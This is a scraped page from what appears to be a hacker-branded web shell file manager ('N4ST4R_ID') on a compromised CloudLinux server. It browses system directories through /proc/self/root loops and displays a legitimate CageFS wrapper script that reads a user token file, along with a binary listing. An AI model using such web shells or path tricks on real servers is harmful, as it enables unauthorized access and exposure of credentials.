Submit
Path:
~
/
/
proc
/
self
/
root
/
proc
/
self
/
root
/
proc
/
thread-self
/
root
/
proc
/
thread-self
/
root
/
usr
/
lib
/
.build-id
/
ff
/
File Content:
4c1f93fefa1956296aed9df65e60faf60e4063
#!/bin/bash ##CageFS proxyexec wrapper - ver 17 if [[ $EUID -eq 0 ]]; then echo 'Cannot be run as root' exit 1 fi USR=`/usr/bin/whoami` USER_TOKEN_PATH="/var/.cagefs/.cagefs.token" WEBSITE_ISOLATION_FLAG="/opt/cloudlinux/flags/enabled-flags.d/website-isolation.flag" if [[ -f "$WEBSITE_ISOLATION_FLAG" && -n "$WEBSITE_TOKEN_PATH" ]]; then USER_TOKEN_PATH="$WEBSITE_TOKEN_PATH" fi TOKEN=`/bin/cat ${USER_TOKEN_PATH}` # It's user's tmp directory and write to it is secure procedure # because this script is running only under usual user PIDFILE="/tmp/.cagefs.proxy.$$" USER_INTERRUPT=13 CWD=`pwd` ctrl_c_handler() { if [[ -f "$PIDFILE" ]]; then pid=`/bin/cat $PIDFILE` /bin/rm -f $PIDFILE > /dev/null 2>&1 /bin/kill -s SIGINT "$pid" > /dev/null 2>&1 fi exit $USER_INTERRUPT } if [[ -e /var/.cagefs/origin ]]; then ORIGIN=`/bin/cat /var/.cagefs/origin` REMOTE="/usr/bin/ssh -F /etc/ssh/cagefs-rexec_config $USR@$ORIGIN" $REMOTE CAGEFS_TOKEN="$TOKEN" /usr/sbin/proxyexec -c cagefs.sock "$USR" "$CWD" LVE_STATS_CONFIGS_READER $$ "$@" RETVAL=$? else trap 'ctrl_c_handler' 2 CAGEFS_TOKEN="$TOKEN" /usr/sbin/proxyexec -c cagefs.sock "$USR" "$CWD" LVE_STATS_CONFIGS_READER $$ "$@" RETVAL=$? /bin/rm -f $PIDFILE > /dev/null 2>&1 fi exit $RETVAL
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
0d0ff3b8e3363a6f6685bb06ede2e40ac7227c
---
0
13fccf2a88de0defc038cc08cbc9bd36eb4ae0
---
0
310fca7c1eb337f9c207d0fa3e371f98a0f7c2
---
0
5b2190419f898301cddc9f53e6243c15ac7a24
---
0
6626e3aeb85d9f2bc9d2e018f881f229798deb
---
0
760f0ace8a9d5f9b663836492968d667d0826f
---
0
e3f1586d23d2aa14461fba7106b573933880d4
---
0
07b880ca207540140fddcffce700da3e5a2b7c
29504 bytes
0755
09720201dac036916a1a21fa22ab93864f53d3
12160 bytes
0755
0a359e636ca16006df69cd8485e7c05040d993
366424 bytes
0755
0d0ff3b8e3363a6f6685bb06ede2e40ac7227c
bytes
0
13fccf2a88de0defc038cc08cbc9bd36eb4ae0
bytes
0
310fca7c1eb337f9c207d0fa3e371f98a0f7c2
bytes
0
40613eb734e4f08dabf1525f98b513c3d7947f
12072 bytes
0755
4c1f93fefa1956296aed9df65e60faf60e4063
1320 bytes
0755
5103e870b4935bce55e3eeebad149c8f5f2f41
95576 bytes
0755
5b2190419f898301cddc9f53e6243c15ac7a24
bytes
0
5e49ae36f468178f9ea4be45a03ebe93027b9a
16808 bytes
0755
6369b4897c0c5fb81910ac3d9c63ffea1c66bf
639696 bytes
0755
6626e3aeb85d9f2bc9d2e018f881f229798deb
bytes
0
75cab37e0daefc2d4fad9cedbca7b3f21a71e9
11968 bytes
0755
760f0ace8a9d5f9b663836492968d667d0826f
bytes
0
79b12f69d164921bd55af7ff727bf08f56984c
16064 bytes
0755
a02b6b49e96a77fca2cd56d3e67e0dc6261fb3
11768 bytes
0755
a9686afd466c2daabda75f58b94dca5038b193
206944 bytes
0755
aa77953fdca60b5aa01f431714e5d19b6edc33
25080 bytes
0755
bb549b7af38106d3a7be861ea6e69f7eb1b6df
12064 bytes
0755
c0d792babedb039da5d9ea14caccaa4925df6f
19960 bytes
0755
c49ed5166a3a16af22eab118ab777a9455a009
28232 bytes
0755
e3f1586d23d2aa14461fba7106b573933880d4
bytes
0
N4ST4R_ID | Naxtarrr